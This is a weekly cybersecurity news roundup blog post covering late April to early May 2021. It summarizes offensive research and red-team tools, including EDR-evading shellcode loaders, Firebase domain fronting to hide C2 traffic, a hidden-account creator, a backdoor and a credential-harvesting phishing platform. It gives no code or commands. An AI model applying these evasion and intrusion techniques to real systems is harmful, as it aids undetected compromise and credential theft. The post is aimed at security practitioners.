Policy change (@github), Marauder's map (@Jean_Maes_1994), Null byte injection in GoAhead (@luker983), in-mem DLL loader (@scythe_io), Firebase fronting (@shantanukhande), Source Engine client RCE (@4lpine), and more!
Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-04-26 to 2021-05-03.
News
- A call for feedback on our policies around exploits and malware. The Microsoft owned GitHub has taken down a few exploits in the past (all against Microsoft products I believe). While there are lots of hot takes on infosec twitter about how this is the end of hosting exploits on GitHub, from my reading GitHub is being about as reasonable as a Microsoft owned company can be at this stage. If we see projects being removed at a higher rate after this, perhaps those hot takes will be warranted. I find it somewhat ironic that git was built as a way to share code peer-to-peer (decentralized) and we as a community have turned to one centralized git host for nearly all our code.
- The IRS Wants Help Hacking Cryptocurrency Hardware Wallets. I find it interesting the IRS is looking for "repeatable, consistent" process to break hardware devices designed to store secrets and launches Operation Hidden Treasure, while there are maybe other issues to focus on.
- Why Google Should Stop Logging Contact-Tracing Data. After all the cryptographic work to ensure contract-tracing apps would preserve privacy, Google goes and dumps all the temporary identifiers into logs readable by phone manufacturers and other "privileged" apps. Who would have thought that a massive surveillance system on every smartphone would be potentially abused (surprised-pickachu.jpg).
Techniques
- I Solemnly Swear I Am Up To No Good. Introducing the Marauders Map. Jean-Francois makes good points about developing your own tools, or at least understanding the tools/scripts you use in a Pentest. He has created an internal attack toolkit that can run C# binaries from the internet. This is useful for constrained environments like Citrix desktops or other machines with limited access to applications beyond MS Office, as you can run them from Macros.
- Discovering Null Byte Injection Vulnerability in GoAhead. This article goes to show that sometimes CTFs turn out real vulnerabilities!
- Overcoming Issues Using Custom Python Scripts with Burp Suite Professional. Burp Suite Professional is a great tool, and one of the best features is the ability to add your own features! Using the Python Scripter extension you are able to modify all requests, even from the active scanner, to get better results against custom web applications.
- Password reset code brute-force vulnerability in AWS Cognito. While there were limits on password reset tokens (6-digit numbers), the researchers in this post managed to use Turbo Intruder and simultaneous TCP connections to get a 0.32% chance of guessing a Cognito reset token. Not bad if you have a big list of users.
- Linux Kernel /proc/pid/syscall information disclosure vulnerability. While not super useful on its own, if you have a Linux bug that requires an information disclosure to defeat ASLR, this might be for you.
- Firebase Domain Front - Hiding C2 as App traffic. While Azure has killed classic domain fronting, these "function" based fronts will continue to work because the ability to run arbitrary code as a "function" is their core purpose.
- Exploiting the Source Engine (Part 2) - Full-Chain Client RCE in Source using Frida. This very detailed post shows how Frida and x32dbg were used to get an RCE by modifying a Team Fortress 2 server to send malformed traffic.
Tools and Exploits
- DripLoader is an evasive shellcode loader for bypassing event-based injection detection, without necessarily suppressing event collection, but does use direct syscalls. By using "standard" looking allocations and APIs, along with delays, DripLoader makes it difficult of EDRs to detect malicious activity during loading. It may be worth borrowing some of these techniques for your own custom loader.
- vaf is a "very advanced fuzzer" written in Nim. While not as featured as ffuf I enjoy seeing more Nim projects.
- SharpNamedPipePTH is a C# version of the tool to use Pass-the-Hash for authentication on a local Named Pipe for user Impersonation. There is a blog post for explanation (from LWiS 2020-04-19).
- memory-module-loader is an implementation of a Windows loader that can load dynamic-link libraries (DLLs) directly from memory. The loader exposed by the Windows operating system can only load modules from disk via LoadLibrary or LoadLibraryEx. However, it is entirely possible to load libraries from memory instead. This is one such implementation. This loader supports loading resources as well.
- MicroBackdoor is a C2 tool for Windows targets with an easily customizable codebase and small footprint. Micro Backdoor consists of a server, client, and dropper. It wasn't designed as replacement for your favorite post-exploitation tools but rather as really minimalistic thing with all of the basic features in less than 5000 lines of code.
- DoUCMe leverages the NetUserAdd Win32 API to create a new computer account. This is done by setting the usri1_priv of the USER_INFO_1 type to 0x1000. The primary goal is to avoid the normal detection of new user created events (4720). This will hide the user in the Control Panel and the lusrmgr.msc Snap In. It will show up in the Group Listing, but not as a user.
- interactsh is an open-source solution for out of band data extraction, A tool designed to detect bugs that cause external interaction (blind SQLi, blind CMDi, SSRF, etc). Interactsh is an alternative to Burp Collaborator with potential to tie into other tools (i.e. nuclei).
New to Me
This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!
- paragon is a red team engagement platform with the goal of unifying offensive tools behind a simple UI. This project looks really cool, and does a ton of the heavy lifting that everyone who has though, "I'll write my own implant/c2" has run into. I'm surprised this hasn't gotten more press (or maybe I've just missed it?).
- SniperPhish is a phishing platform that has a few more features than the favorite Gophish, like an advanced web page builder to customize credential harvesting. I have yet to find a phishing platform that allows for "inbox management" (i.e. replying to emails via the web interface).
This post is cross-posted on SIXGEN's blog.